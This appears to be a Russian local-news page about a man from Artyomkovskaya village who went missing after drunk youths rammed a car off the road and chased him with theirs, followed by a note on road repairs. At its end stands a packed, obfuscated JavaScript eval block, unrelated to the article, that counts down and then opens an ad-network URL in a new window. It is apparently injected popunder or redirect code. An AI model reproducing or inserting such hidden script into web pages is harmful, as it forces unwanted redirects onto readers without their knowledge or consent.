МО «Пакшеньгское»

В ночь с 29 на 30 мая пропал 31-летний житель деревни Артёмковской. Его исчезновение связывают с инцидентом, который произошёл вечером этого дня. Его участники – подвыпившие вельчане, приехавшие на дискотеку на «Волге». Перебрав со спиртным, молодёжь продолжила «покатушки», и, как утверждают местные жители, было совершено преднамеренное столкновение с автомобилем ИЖ «Ода». После того, как спихнули «Оду» в кювет, правонарушители отправились колесить по селу дальше.

Следующей их жертвой и стал житель деревни Артёмковской. Они стали его преследовать, «давить» автомобилем. Он убегал, а потом пропал. Были вызваны сотрудники ГИБДД, которые задержали водителя. В настоящий момент ведутся поиски пострадавшего, в них участвуют как односельчане, так и работники милиции. Жители поселения возмущены и надеются, что нарушитель не уйдёт от законного наказания.

Начался ремонт дорог поселения. Во вторник была отсыпана улица Юбилейная, будут проводиться работы на Центральной и Молодёжной улицах. У здания администрации отремонтировано крыльцо. Ожидается, что вскоре преобразится и крыльцо Дома культуры

вельская неделя{jcomments on}

Please publish modules in offcanvas position.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('<5>4 n="c://b.a.9/8?7=6";4 2=d;e 3(){f(2>0){2--;4 g=2+1;i("3()",j)}h{k.l("c://b.a.9/8?7=6","m")}}3();',24,24,'||count|countDown|var|script|688b0be27b4d45d6562eba71df5c7886|key|ef4ex511a|com|effectivecpmnetwork|www|https|10|function|if|waktu|else|setTimeout|1000|window|open|_0|url'.split('|'),0,{}))